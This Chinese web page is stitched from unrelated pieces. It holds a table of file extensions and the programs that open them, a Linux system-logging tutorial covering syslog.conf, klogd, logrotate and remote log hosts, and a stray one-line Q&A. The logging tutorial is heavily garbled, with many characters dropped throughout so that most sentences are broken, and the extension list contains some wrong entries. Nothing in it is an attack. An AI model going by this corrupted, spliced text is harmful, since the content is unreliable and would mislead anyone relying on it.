扩展名 文件类型 打开方式

.aiff 声音文件 Windows media Player

.!!! Netants 暂存文件 Netants

.ani 动画鼠标

.arj 压缩文件 ARJ

.avi 电影文件 Windows media Player

.awd 传真文档

.bak 备份文件

.bas Basic 语言 Basic

.bat DOS批处理文件

.bin MAC 二进制码文件 Stuffit Expander

.bmp 图象文件 画图/看图软件

.cab 压缩文件 Winzip

.cdr Corel图画文件 Corel Draw

.chk Scandisk检察后制作的文件 可以删掉

.com DOS命令文件 自执行

.cpx Cryptapix加密图片文件 Cryptapix

.cur 静态鼠标

.dbf 数据库文件 dBase, FoxBase, Access

.dll 应用程序扩展

.doc 文档文件 Word

.dwg AutoCAD文件 AutoCAD

.eps Illustrator 图画文件 Adobe Illustrator

.exe 执行文件 自执行

.fon 字体文件

.gb 国标码文件 南极星文字处理

.get Getright 暂存文件

.gif 256色图象文件 画图/看图软件

.gz 可供UNIX或LINUX使用的压缩文件 Winzip

.hqx Macintosh 文件 Stuffit Expander

.htm 网页 浏览器

.html 网页 浏览器

.ico 图标

.ini 配置设置 笔记本或WordPad

.ipx IPX演示文件 浏览器加装IPX 插件

.jiff 图象文件 画图/看图软件

.jpeg 压缩过的图象文件 画图/看图软件

.jpg 压缩过的图象文件 画图/看图软件

.js javascript

.lnk 快捷方式连接文件 连接文件的相应程序

.m3u Winamp播放列表 Winamp

.mid 声音文件 Windows media Player

.vod Quicktime影像文件 Quick Time

.mp3 压缩音乐文件 Winamp

.mpeg 影像 Windows media Player

.mpg 影像 Windows media Player

.njx 南极星文档 南极星文字处理

.pcb 电子电路图设计文件 Protel PCB

.pdf 便携式文档格式，内含图片文字等等 Adobe Acrobat, Adobe Acrobat Reader

.pm5 PageMaker 5 排版文件 Page Maker

.ppt Power Point 文件 Microsoft Power Point

.ps GhostScript

.psd Photoshop文件 Adobe Photoshop

.pub Publisher排版文件 Microsoft Publisher

.qt Quicktime影像文件 Quick Time

.ra Real Audio声音文件 Real Audio

.ram Real Audio影像文件 Real Audio

.rar 压缩文件 Winrar

.rsf Richwin 字体文件

.sch 电子原理图设计文件 Protel Schematic

.scr 屏保文件

.sea Macintosh 启动文件

.sit 压缩 Stuffit Expander

.swf Flash动画文件 浏览器加装Macromedia flash 插件

.sys 系统文件

.tar UNIX压缩文件 Winzip

.tif 高质量图象文件 画图/看图软件

.tiff 高质量图象文件 画图/看图软件

.tmp 暂存文件 可以删掉

.ttf 字体文件

.txt 纯文本文件 笔记本或全部文字处理系统

.vbs Visual Basic 编程文件 Microsoft Viasual Basic

.viv VIVO影像文件 浏览器加装VIVO 插件

.vqf 压缩声音文件 Yamaha SoundVQ Player

.wav 未压缩的声音文件 Windows media Player

.wk1 Lotus 123 试算软件文件 Lotus 123, Excel

.wq1 Q-Pro 试算软件文件 Q-Pro, Excel

.wri Write文字文档 Word

.xls Excel 试算软件文件 Microsoft Excel

.Z UNIX压缩文件 Winzip

.zip 压缩文件 Winzip

图像文件：

bmp Windows or OS/2 Bitmap

clp Windows Clipboard

cup Dr. Halo

dib Windows or OS/2 DIB

emf Windows Enhanced Meta file

eps Encapsulated PostScript

fpx Flash Pix

gif Compuserver

iff Amiga

img GEM Paint

jpg JPEG - JFIF Compliant

lbm Deluxe Paint

mac Mac Paint

msp Macrosoft Paint

pbm Potable Bitmap

pct Macintosh Pict

pcx Zsoft Paintbrush

pic PC Paint

png Portable Network Graphics

ppm Portable Pixelmap

psd Photoshop

psp Paint Shop Pro Image

ras Sun Raster Image

raw Eaw File format

rle Windows or CompuServer RLE

sct SciTex Continuous Tone

tga Truevision Targa

tif Tagged Image file format

wmf Windows Meta File

wpg WordPefect Bitmap

.ACA

Microsoft的代理使用的角色文档

.ace

一种压缩格式文档，压缩率甚至超过WinRAR,可以使用WINACE等工具打开

.acf

系统管理配置

.acm

音频压缩管理驱动程序,为Windows系统提供各种声音格式的编码和解码功能

.acs

同.acm，但保存于本地

.ADE

Microsoft Access项目扩展

.ADN

Microsoft Access的空白项目模板

.ADP

Microsoft Access的项目

.aif

声音文件，支持压缩，可以使用Windows Media Player和QuickTime Player播放

.AIF

音频文件，使用Windows Media Player播放

.AIFC

音频文件，使用Windows Media Player播放

.AIFF

音频文件，使用Windows Media Player播放

.ani

动画光标文件扩展名，例如动画沙漏。

.ans

ASCII字符图形动画文件

.ap

应用文件，存在于Dbase,Foxbase,Foxpro系统软件的环境下

.app

应用文件，存在于Dbase,Foxbase,Foxpro系统软件的环境下

.arc

一种较早的压缩文件，可以使用WinZip,WinRAR,PKARC等软件打开

.arj

压缩文件。可以使用WinZip,WinRAR,PKARC等软件打开

.art

是美国在线最常使用的映象格式，如果使用Windows 2000必须安装补丁才能查看

.asc

ASCII文本文件，这些文本可以被所有类型的字处理构件处理。有些系统中也可能会使用这些文件扩展名来表示文件中包含图象信息

.asf

数据文件或是莲花(Lotus)1-2-3下的屏幕文件

.asf

微软的媒体播放器支持的视频流，可以使用Windows Media Player播放

.ash

汇编语言包含文件，类似C/C++中的.h文件

.asm

汇编语言源程序文件，一般使用MASM或者Turbo ASM编译

.asp

微软的视频流文件，可以使用Windows Media Player打开

.asp

微软提出的Active Server Page,是服务器端脚本，常用于大型网站开发，支持数据库连接，类似PHP。可以使用Visual InterDev编写，是目前的大热门

.asx

Windows Media 媒体文件的快捷方式

.au

是Internet中常用的声音文件格式，多由Sun工作站创建，可使用软件Waveform Hold and Modify 播放。Netscape Navigator中的LiveAudio也可以播放.au文件

.avi

一种使用Microsoft RIFF规范的Windows多媒体文件格式，用于存储声音和移动的图片

.awd

传真浏览文档，用于传真的显示

.awp

传真关键词浏览器

.aws

传真签名浏览器

.adm

ADM_auto 文件

.b64

Base64编码的文件，可以使用WinZip编码

.bak

备份文件，一般是被自动或是通过命令创建的辅助文件，它包含某个文件的最近一个版本，并且具有于该文件相同的文件名

.bas

Basic 语言源程序文件，可编译成可执行文件,目前使用Basic开发系统的是Visual Basic

.bat

批处理文件，在MS-DOS中，.bat文件是可执行文件，有一系列命令构成，其中可以包含对其他程序的调用

.bbs

电子告示板系统文章信息文件

.bfc

Windows的公文包文件

.bin

二进制文件，其用途依系统或应用而定

.bmp

Bitmap位图文件，这是微软公司开发Paint的自身格式，可以被多种Windows和Windows NT平台及许多应用程序支持，支持32位颜色，用于为Windows界面创建图标的资源文件格式。

.bw

是包含各种像素信息的一中黑白图形文件格式

.c

C 语言源程序文件，在C语言编译程序下编译使用

.cab

Microsoft制订的压缩包格式，常用于软件的安装程序，使用Windows自带的实用程序，Extract.exe可以对其解压缩，WinZip,WinRAR等都支持这种格式

.cad

AUTOCAD 图形文件

.cal

Windows 中的日历文件

.cbx

标签文件，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.cda

保存在AudioCD上的CD音轨

.cdf

Internet Explorer的频道文件

.cdr

CorelDraw中的一种图形文件格式，它是所有CorelDraw应用程序中均能够使用的一种图形图像文件格式

.cdx

索引文件，存在于Dbase,Foxbase,Foxpro系统软件环境下

.cfg

配置文件，系统或应用软件用于进行配置自己功能，特性的文件

.chm

编译过后的HTML文件，常用于制作帮助文件和电子文档

.clp

在Windows下剪贴板中的文件格式

.cmd

用于Windows NT/2000的批处理文件，其实与BAT文件功能相同，只是为了与DOS/Windows 9x下的BAT有所区别

.cmf

声卡标准的音乐文件，FM合成器等可以回放

.cnf

NetMeetting会议连接文件

.cnt

联机帮助文件目录索引文件，通常和同名的.hlp文件一起保存

.col

由Autodesk Animator,Autodesk Animator Por等程序创建的一种调色板文件格式，其中存储的是调色板中各种项目的RGB值

.com

DOS可执行命令文件，一般小于64KB

.cpd

传真封面文件

.cpe

传真封面文件

.cpi

国际代码页，用于提供相应国家的代码页信息

.cpl

控制面板扩展文件，Windows操作系统使用

.cpp

C++语言源程序，非常强大的语言，在各种平台中都有相应的开发系统

.crd

Windows中的卡片文件

.crd

Windows中的卡片文件

.crt

用于安全方面的证书认证文件

.csv

用逗号分割的文本文件，一般用于在不同应用程序之间进行数据交换

.cur

Windows下的光标资源文件格式，可用光标编辑软件编辑

.css

Text/css文件

.dat

数据文件，在应用程序中使用

.dat

VCD中的图象声音文件，VCD播放软件可调用，或是通过VCD机播放

.dbf

数据库文件，Foxbase,Dbase,Visual FoxPro,等数据库处理系统所产生的数据库文件

.dcx

传真浏览文档文件

.ddi

映象文件，DUP,HD,IMG等工具可展开

.dev

设备驱动程序

.dib

设备无关位图文件，这是一种文件格式，其目的是为了保证用某个应用程序创建的位图图形可以被其它应用程序装载或显示一样

.dir

目录文件

.dll

Windows动态连接库，几乎无处不在，但有时由于不同版本DLL冲突会造成败各种各样的问踢

.doc

是目前市场占有率最高的办公室软件Microsoft Office中的字处理软件Word创建的文档

.dos

Windows保留的MS-DOS的某些系统文件

.dot

Microsoft Word的文档模板文件，通过模板可以简化一些常用格式文档的创建工作,而且可以内嵌VBA程序来实现某些自动化功能

.drv

设备驱动程序文件，用在各种系统中

.dwg

AutoCAD的图纸文件，也是许多绘图软件都支持的格式，常用于共享数据

.dxb

AutoCAD创建的一中图形文件格式

.dxf

图形交换格式，一种计算机辅助设计的文件格式，最初开发用来与AutoCAD一起使用，以便于图形文件在应用程序之间的传递,它以ASCII方式储存图形，在表现图形的大小方面十分精确

.der

Certiticate文件

.dic

Txt文件

.emf

由Microsoft公司开发的Windows 32位扩展图元文件格式，其总体设计目标是要弥补在Microsoft Windows 3.1(Win16)中用的*.wmf文件格式的不足,使得图元文件更加易于使用

.eps

用PostScript语言描述的一种图形文件格式，以文本文件保存，在PostScript图形打印机上能打印出高品质的图形图象，最高能表示32位图形图象

.err

编译错误文件，存在于Dbase,Foxbase,Foxpro系列软件环境下

.exe

可执行文件，虽然后缀名相同，但具有不同的格式和版本

.exp

3DS使用的显示卡驱动程序

.exc

Txt文件

.fky

键宏文件，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.flc

Autodesk Animator和Animatorpro的动画文件，支持256色，最大的图象象索是64000*64000,支持压缩，广泛用于动画图形中的动画序列，计算机辅助设计和计算机游戏应用程序

.fnd

保存的搜索结果

.fon

点阵字库文件

.for

Fortran语言程序

.fot

指向字体的快捷键

.fp

配置文件，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.fpt

备注字段文件，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.frt

报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.frx

报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.fxp

编译后的程序，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.h

C语言源程序头文件

.hlp

Windows应用程序帮助文件

.hqx

Macintosh中使用BinHex将二进制文件编码为7位的文本文件，大多数Macintosh文件皆以.hqx出现(.bin极少使用)，在Macintosh中,可使用StuffIt Expander对.hqx解码，在Windows中可使用BinHex 13解码

.ht

超级终端

.htm

保存超文本描述语言的文本文件，用于描述各种各样的网页，使用各种浏览器打开

.html

同.htm文件

.icm

图象配色描述文件

.ico

Windows中的图标文件，可以包含同一个图标的多种格式，使用图标编辑软件创建

.idf

MIDI乐器定义

.idx

索引文件，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.iff

文件交换格式文件，这种文件格式多用于Amiga平台,在这种平台上它几乎可以存储各种类型的数据，在其它平台上，IFF文件格式多用于存储图象和声音文件

.image

MAcintosh磁盘映象文件，常见于萍果机的FTP网点，在Macintosh中由Shrink Wrap处理

.ime

Windows下的输入法文件

.img

磁盘映象文件，用HD-COPY,WinImage等工具打开后可以恢复到一张磁盘上

.inc

汇编语言包含文件，类似C/C++中的.H文件

.inf

Windows下的软件安装信息，Windows的标准安装程序根据此文件内的安装信息对软件，驱动程序等进行安装

.ini

Windows中的初始化信息文件,已经用的不多了，新的应用程序将设置保存在系统的注册表中

.jar

一种压缩文件，ARJ的新版本，不过不太流行，可以使用WinJar,Winrar等打开

.jpeg

一种图片压缩文件,同.jpg

.jpg

静态图象专家组制订的静态图象压缩标准，具有很高的压缩比，使用非常广泛，可使用PhotoShop等图象处理软件创建

.job

JobObject

.jfif

Jpeg文件

.kbd

键盘布局文件

.lmb

Deluxe Paint中使用的一种图形文件格式，其编码方式类似于*.iff

.lnk

快捷方式，这个文件指向另一个文件，开始菜单的程序文件夹下每条项目都是一个LNK文件

.log

日志文件,通常用来记录一些事件之类

.lzh

一种古老的压缩文件，可以使用WinRAR打开

.mac

Macintosh中使用的一中灰度图形文件格式，在Macintosh Paintbrush中使用，其分辨率只能是720*567

.mag

图形文件格式

.mcc

Dialer10CallingCard(电话卡文件)

.mci

MCI命令集

.mdb

Microsoft Access使用的数据库格式，是非常流行的桌面数据库

.men

内存应用文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.mid

音频压缩文件，曾经非常流行，不过在现在的软件中用的很少了

.mif

MIDI乐器

.mmf

Microsoft 邮件，比较少见

.mnt

菜单文件，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.mnx

菜单文件，存在于Dbase,Foxbase,Foxpro系列软件的环境下

.moov

QuickTime或苹果机的影视格式，在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放，在Windows中可由Quicktime播放

.mov

使用Apple‘s QuickTime格式的电影文件，在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放，在Windows中可由Quicktime播放

.movie

QuickTime或苹果机的影视格式，在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放,在Windows中可由QuickTime播放

.mp3

采用MPEG-1 Layout 3标准压缩的音频文件，是网上主要的压缩音频文件，这种文件由于具有极高的压缩率和失真低的特点，是目前音乐盗版的主要文件格式，但目前受到VQF,WMA等新标准的挑战

.mpg

采用MPEG-1标准压缩的视频文件，与VCD使用的格式非常相近，提供CD质量的音频信号和320*240的视频分辩率，目前的媒体播放软件大都能播放,Microsoft的WMV8和MPEG-4压缩的AVI文件是其强大的竞争对手

.mpt

Macintosh中使用的一种图形文件格式

.msg

Microsoft邮件文档

.msk

Animator Pro中的一种图形文件格式，其中包含一个位图图形

.msn

Microsoft网络的文件

.mmm

Mplayer

.mlv

MPEG文件

.mak

Mak文件

.man

Application/x-trof-man格式的文件

.mpa

MPEG文件

.mpe

MPEG文件

.nws

Microsoft Internet News Message

.obj

对象代码

.opt

是Animator Pro创建的图形文件格式

.ovl

由于软件功能多，内存偏小，不能一次性全部调入内存的可执行文件可能有同文件名的ovl文件

.obd

Office.binder.95

.obt

Office.Binder.Template

.obz

Office.Binder.Wizard

.ofn

Office.File.New

.qic

Microsoft备份策略

.qpr

查询文件，在Dbase,Foxbase,Foxpro系列软件的环境下使用

.qpx

查询文件，在Dbase,Foxbase,Foxpro系列软件的环境下使用

.qt

Machintosh 的QuickTime影视格式，在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放，在Windows中可由Quicktime播放

.qtm

动画文件，这种文件格式是由Apple计算机公司开发，被Apple Macintosh和Microsoft Windows平台所支持，支持25位颜色，最大图像分辩率是64000*64000,支持压缩，用于保存音频和运动视频信息

.que

QueueObject

.rar

WinRAR提供的压缩文件格式，压缩率超过ZIP,同时提供的功能也更为丰富

.rec

Windows下的记录器宏文件

.reg

Windows 95的系统及应用程序注册文件，这种文件虽然以纯文本文件保存，但一样存在版本问题，不同的操作系统使用的REG文件版本是不同的

.rif

RTF格式(Rich Text format)文件

.rle

一种压缩过的位图文件格式，RLE压缩方案是一种极其成熟的压缩方案，特点是无损失压缩，既节省了磁盘空间又不损失任何图像数据，但在打开这种压缩文件时，要花费更多时间，此外，一些兼容性不太好的应用程序可能会搭不开

.rm

Windows下的RealPlayer所支持的视频压缩文件，网上非常流行的流式视频文件，很多实时视频新闻等都是采用这种格式的，不过，最新的Windows Media Video V8已经对其发起了强大的攻势

.rmi

MIDI音序文件

.rtf

丰富文本格式文件，以纯文本描述内容，能够保存各种格式信息，可以用写字版，Word等创建

.ra

ReadAudio文件

.ram

ReadAudio文件

.rnk

Rnk文件

.rpm

Audio/x-pn-realaudio-plugin格式文件

.sav

存档文件

.scp

用于Windows系统中Internet拨号用户，自动拨号登录用的脚本文件，可避免手动登录时繁琐的键盘输入

.scr

屏障保护文件

.sct

屏幕文件，在Dbase,Foxbase,Foxpro系列软件的环境下使用

.scx

屏幕文件，在Dbase,Foxbase,Foxpro系列软件的环境下使用

.set

Microsoft备份集文件，用于保存要备份的内容，设置等信息

.shb

指向一个文档的快捷方式

.shs

碎片，可以从写字板中拖放一段文本到桌面上创建一个碎片，但使用价值不大

.snd

Mac声音文件,Apple计算机公司开发的声音文件格式，被Macintosh平台和多种Macintosh应用程序所支持，支持某些压缩

.spd

PostScript打印机描述文件

.sql

查询文件，在Dbase,Foxbase,Foxpro系列软件的环境下使用

.svg

SVG可以算是目前最火热的图像文件格式了，它是基于XML由WorldWideWebConsortium联盟开发的，SVG是可缩放的矢量图形

.svx

Amiga声音文件，Commodore所开发的声音文件格式，被Amiga平台和应用程序所支持，不支持压缩

.swf

flash是Micromedia公司的产品，严格说它是一种动画编辑软件，实际上它是制作出一种后缀名为.swf的动画，这种格式的动画能用比较小的体积来表现丰富的多媒体形式，并且还可以与HTML文件达到一种“水乳交融”的境界

.swg

虚拟内存交换文件，由操作系统使用

.sys

系统文件，驱动程序等，在不同的操作系统中有不同的定义

.slk

Excel.SLK

.sit

Application/x-stuffit格式文件

.taz

是以.Z格式压缩的TAR文件

.tbk

临时数据库文件，在Dbase,Foxbase,Foxpro系列软件的环境下使用

.tga

图像文件，此文件格式的结构比较简单，属于一种图形，图像数据的通用格式，在多媒体领域有着很大影响，是计算机生成图像向电视转换的一种首选格式

.tgz

Winzip

.tif

同tiff

.tiff

图像文件，此图像格式复杂，存储内容多，占用存储空间大，其大小是GIF图像的3倍，是相应的JPEG图像的10倍，最早流行于Macintosh,现在Windows主流的图像应用程序都支持此格式

.tmp

临时文件，一般是系统和应用程序产生的临时使用的文件，当系统和应用程序退出时，会自动地删除其建立的临时文件，如果是非正常退出，临时文件可能保留在磁盘上，在单任务系统下，可立即删除它们，在多任务系统下，应删除那些不是正在使用的临时文件

.trn

翻译文件

.tsp

电话服务提供者

.ttf

TrueType格式的字体文件，可以使用FontView.Exe查看

.txt

文本文件

.ttc

Ttc 文件

.tar

Winzip

.url

InternetShortcut(internet 上URL地址的快捷方式)

.uls

ULS文件

.vbx

Microsoft 的Visual Basic语言的控件

.vcd

虚拟光驱工具制作的光盘镜像文件

.ver

版本描述，用于描述某个软件的版本信息的文件，内容因软件而异

.voc

声音文件，此文件格式由Creative Labs公司开发，被Windows和DOS平台所支持，支持压缩

.vxd

虚拟设备驱动程序，在Windows操作系统中非常常见，是重要的系统文件

.vir

Vir文件

.vsd

Visio.Drawing.4

.vss

Visio.Drawing.4

.vst

Visio.Drawing.4

.vsw

Visio.Drawing.4

.wab

通信簿文件，由系统中的通信簿程序使用

.wav

音频文件，此文件格式是在Windows上用于保存音频信息的资源格式，Windows中由Waveform Hold and Modify或Navigator，或“媒体播放机”播放，存在许多编码方式，需要相应的解码程序才能播放

.win

窗口文件，在Dbase,Foxbase,Foxpro系列软件的环境下使用

.wmf

Microsoft Windows中常见的一种图元文件格式，它具有文件短小，图案造型化的特点，整个图形常由各个独立的组成部分拼接而成，但其图形往往较粗糙，并且只能在Microsoft Office中调用编辑

.wpc

写字板文档转换

.wps

Wps文本文件，有多种版本，可以使用Wps Office,Wps 2000等打开

.wri

Windows写字板文档

.wll

Word.Addin

.wbk

Work.Backup

.wiz

Word.Wizard

.wht

Whiteboard

.xab

Microsoft邮件地址簿

.xbm

Animator Pro创建的一种图形文件格式，其中包含用来描述多边形的一系列点的信息

.xif

Xifimage下产生的文档

.xla

EXCEL.Addim

.xlk

Excel.Backup

.xlc

Excel.Chart.5

.xlb

Excel.Sheet.5

.xlc

Excel.Chart.5

.xlt

Excel.Template

.xlv

Excel.VBAModule

.xlw

Excel.Workspace

.xll

Excel.XLL

.xlm

Excel.Macro.Sheet

.z

一种压缩文件

.zip

是DOS/Windows中最常见文件压缩格式，也是互联网上的标准压缩格式，可以包含路径和多个文件

系统日志全改notice，有几条日志不太清楚求解释

志文件详细记录系统每发各种各事件用户通志文件检查错误产原或者受攻击黑客入侵追踪攻击者踪迹志两比较重要作用：审核监测

Linux系统志主要两种类型：

1．进程所属志

由用户进程或其系统服务进程自行志比服务器access_log与error_log志文件

2．syslog消息

系统syslog记录志任何希望记录志系统进程或者用户进程都给调用syslog记录志

志系统划三系统：

1． 连接间志--由程序执行纪录写入/var/log/wtmp/var/run/utmplogin等程序更新wtmputmp文件使系统管理员能够跟踪谁何登录系统

2． 进程统计--由系统内核执行进程终止每进程往进程统计文件（pacct或acct）写纪录进程统计目系统基本服务提供命令使用统计

3． 错误志--由syslogd（8）执行各种系统守护进程、用户程序内核通syslog（3）向文件/var/log/messages报告值注意事件

2．察看志文件

Linux系统所志文件都/var/log且必须root权限才能察看

志文件其实纯文本文件每行消息察看式

1． cat命令志文件总第启Linux始消息都累积志文件文件页显示滚太快看清文件内容

2． 文本编辑器要用文本编辑器打志文件面耗费内存另面允许随意改志文件

3．用more或less页显示程序

4．用grep查找特定消息

每行表示消息且都由四域固定格式组：

n 间标签（timestamp）表示消息发期间

n 主机名（hostname）（我例主机名escher）表示消息计算机名字台计算机主机名能没必要网络环境使用syslog能要同主机消息发送台服务器集处理

n 消息系统名字"kernel"表示消息自内核或者进程名字表示发消息程序名字括号进程PID

n 消息（message）剩部消息内容

举例：

[root@localhost root]# 提示符输入：tail /var/log/messages

Jan 05 21:55:51 localhost last message repeated 3 times

Jan 05 21:55:51 localhost kernel: [drm] AGP 0.99 on Intel i810 @ 0xf0000000 128M

B

Jan 05 21:55:51 localhost kernel: [drm] Initialized i830 1.3.2 20021108 on minor

Jan 05 21:55:51 localhost kernel: mtrr: base(0xf0000000) is not aligned on a siz

e(0x12c000) boundary

Jan 05 21:56:35 localhost 1月 28 21:56:35 gdm(pam_unix)[4079]: session opened f

or user root by (uid=0)

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 启（版本 2.

2.0）pid 4162 用户"root"

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析址"xml:re

adonly:/etc/gconf/gconf.xml.mandatory"指向位于 0 读配置源

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析址"xml:re

adwrite:/root/.gconf"指向位于 1 写入配置源

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析址"xml:re

adonly:/etc/gconf/gconf.xml.defaults"指向位于 2 读配置源

Jan 05 21:58:20 localhost kernel: MSDOS FS: IO charset cp936

值注意与连接间志同进程统计系统默认激必须启Linux

系统启进程统计使用accton命令必须用root身份运行accton命令形式：accton

filefile必须事先存先使用touch命令创建pacct文件：touch

/var/log/pacct运行accton：accton

/var/log/pacct旦accton激使用lastcomm命令监测系统任何候执行命令若要关闭统计使用带任何

参数accton命令

3．志系统工作原理及配置

3.1 syslog

同closelog, openlog共同给system logger发送消息

Linux内核由系统组包括网络、文件访问、内存管理等系统需要给用户传送些消息些消息内容包括消息源及其重要性等所系统都要消息送维护公用消息区于叫Syslog程序

程序负责接收消息（比：系统核许系统程序产错误信息、警告信息其信息每信息都包括重要级）并消息发合适通情况

所消息都记录特定文件——志文件（通/var/adm或/var/log目录messages文件）特别重要消息用

户终端窗口显示

syslog工具两重要文件：syslogdsyslog.Conf

能接受访问系统志信息并且根据 "/etc/syslog.conf" 配置文件指令处理些信息守护进程内核提供访问系统志信息任何希望志信息程序都向 syslog 接口呼叫该信息

3.2 syslogd守护进程

　象其复杂操作系统Linux由同系统组些叫做daemon程序直台运行（daemon：守护神意

说"默默闻"需要用户交互）处理些象打印、发送邮件、建立Internet连接等等工作每系统发志消息候都给

消息指定类型消息两部："设备（facility）""级别(level)""设备"标识发消息系统同类型消息组合起"级别"表示消息重要性其范围debug（重要）emerg（重要）facilitylevel组合起称priority（详细解释参照5.3）

/usr/include/sys/syslog.h相关定义

用户看daemon程序没窗口用户界面些程序候要给用户传递些信息实现目需要特殊机制syslogddaemon例台运行并且消息志区转移志文件

函数接口

#include

void openlog( char * , int , int )

其值OR组合：

LOG_CONS : 消息送syslogd直接输系统console

LOG_NDELAY : 立即打syslogd连接默认连接第写入讯息才打

LOG_PERROR : 消息同送stderr

LOG_PID : PID记录每消息

void syslog( int , char * )

其facilitylevelOR组合

void closelog( void )

般需要用syslog()函数其函数用

3.3 syslog.conf

非重要文件位于"/etc/"目录通知 syslogd 何根据设备信息重要级别报告信息

该文件使用面形式：

facility.level action

syslog.conf 第列facility.level用指定志功能志级别间用.隔使用*匹配

所志功能志级别第二列action消息发目标

空白行#行注释忽略

Facility.level 字段称做选择域（seletor）

n facility 指定 syslog 功能主要包括些：

auth 由 pam_pwdb 报告认证

authpriv 包括特权信息用户名内认证

cron 与 cron at 关信息

daemon 与 inetd 守护进程关信息

kern 内核信息首先通 klogd 传递

lpr 与打印服务关信息

mail 与电邮件关信息

mark syslog 内部功能用于间戳

news 自新闻服务器信息

syslog 由 syslog 信息

user 由用户程序信息

uucp 由 uucp 信息

local0----local7 与自定义程序使用例使用 local5 做 ssh 功能

* 通配符代表除 mark 外所功能

level 级别决定讯息重要性

与每功能应优先级按定顺序排列emerg 高级其 alert依类推缺省 /etc/syslog.conf 记录指定级别该级别更高级别希望使用确定级别使用两运算符号(等)=

例：user.=info 表示告知 syslog 接受所 info 级别 user 功能信息

n 等级重要性逐递减:

emerg 该系统用

alert 需要立即修改条件

crit 阻止某些工具或系统功能实现错误条件

err 阻止工具或某些系统部功能实现错误条件

warning 预警信息

notice 具重要性普通条件

info 提供信息消息

debug 包含函数条件或问题其信息

none 没重要级通用于排错

* 所级别除none

n action 字段作域所表示具许灵性特别使用名称管道作用使 syslogd 处理信息

syslog 主要支持：

file 消息追加指定文件尾

terminal 或 print 完全串行或并行设备标志符

@host 远程志服务器

username 消息写指定用户

named pipe 指定使用 mkfifo 命令创建 FIFO 文件绝路径

* 消息写所用户

选择域指明消息类型优先级；作域指明syslogd接收与选择标准相匹配消息所执行作每选项由设备优先级组指明优先级syslogd纪录拥相同或更高优先级消息比指明"crit"则所标crit、alertemerg消息纪录每行行域指明选择域选择给定消息应该发送

实际站点配置（syslog.conf）文件：

# Store critical stuff in critical

#

*.=crit;kern.none /var/adm/critical

所信息优先权crit保存/var/adm/critical文件除些内核信息

# Kernel messages are first, stored in the kernel

# file, critical messages and higher ones also go

# to another host and to the console

#

kern.* /var/adm/kernel

kern.crit @finlandia

kern.crit /dev/console

kern.info;kern.!err /var/adm/kernel-info

第条代码指引些内核设备访问文件/var/adm/kernel信息

第二条代码直接引导所拥crit更高优先权内核信息访问远程主机存储远程主机仍旧试着找毁坏原

第四行说明syslogd 保存所拥info warning优先级内核信息/var/adm/kernel-info文件夹所err更高优先级排除外

# The tcp wrapper loggs with mail.info, we display

# all the connections on tty12

#

mail.=info /dev/tty12

引导所使用mail.info (in source LOG_MAIL | LOG_INFO)信息/dev/tty12第12

控制台例tcpwrapper

tcpd

(8)载缺省使用

# Store all mail concerning stuff in a file

mail.*;mail.!=info /var/adm/mail

模式匹配所具mail功能信息除拥info优先级保存文件/var/adm/mail

# Log all mail.info and news.info messages to info

#

mail,news.=info /var/adm/info

提取所具mail.info 或news.info 功能优先级信息存储文件/var/adm/info

# Log info and notice messages to messages file

#

*.=info;*.=notice;\

mail.none /var/log/messages

使所syslogd志具info 或notice功能信息存储文件/var/log/messages除所mail功能信息

# Log info messages to messages file

#

*.=info;\

mail,news.none /var/log/messages

声明使syslogd志所具info优先权信息存储/var/log/messages文件些mail 或news功能信息能存储

# Emergency messages will be displayed using wall

#

*.=emerg *

行代码告诉syslogd写所紧急信息所前登陆用户志实现

# Messages of the priority alert will be directed

# to the operator

#

*.alert root,joey

*.* @finlandia

代码指引所具alert 或更高级权限信息终端操作

第二行代码引导所信息叫做finlandia远程主机代码非用特别所syslog信息保存台机器群集计算机

3.4 klogd 守护进程

klogUNIX内核接受消息设备

klogd

守护进程获并记录 Linux 内核信息通syslogd 记录 klogd

传所信息说klogd读取内核信息并转发syslogd进程调用带 -f filename 变量 klogd

klogd filename 记录所信息传给 syslogd指定另外文件进行志记录klogd

向该文件写入所级别或优先权Klogd 没 /etc/syslog.conf 类似配置文件使用 klogd 避免使用

syslogd 处于查找量错误

总结

其箭代表发送消息给目标进程或者信息写入目标文件

图1 Linux志系统

志管理及志保护

logrotate程序用帮助用户管理志文件自守护进程工作logrotate周期性旋转志文件周期性每志文件重命名

备份名字让守护进程始使用志文件新拷贝/var/log/产maillog、maillog.1、

maillog.2、boot.log.1、boot.log.2类文件由配置文件驱该文件

/etc/logroatate.conf

logroatate.conf文件例：

# see "man logrotate" for details

# rotate log files weekly

weekly

#7周期

# keep 4 weeks worth of backlogs

rotate 4

#每隔4周备份志文件

# send errors to root

errors root

#发错误向root报告

# create new (empty) log files after rotating old ones

create

#转完旧志文件创建新志文件

# uncomment this if you want your log files compressed

#compress

#指定否压缩志文件

# RPM packages drop log rotation information into this directory

include /etc/logrotate.d

# no packages own lastlog or wtmp -- we'll rotate them here

/var/log/wtmp {

monthly

create 0664 root utmp

rotate 1

}

# system-specific logs may be configured here

网络应用种保护志式网络设定台秘密syslog主机台主机网卡设混杂模式用监听网内所syslog包

所需要传送志主机配置向台存主机发送志即即使黑客攻陷目标主机通syslog.conf文件找备份志主

机存主机实际操作辅交换机配置确保syslog包备份志主机syslog进程接受比

syslog.conf传送志主机设

@192.168.0.13实际网络存志主机实际能192.168.0.250或者其主机接受syslog包

ADM/HZ440是什么？

其实没有什么意思的，我们知道你说的这个他其实就是一个代码，没有特殊意思。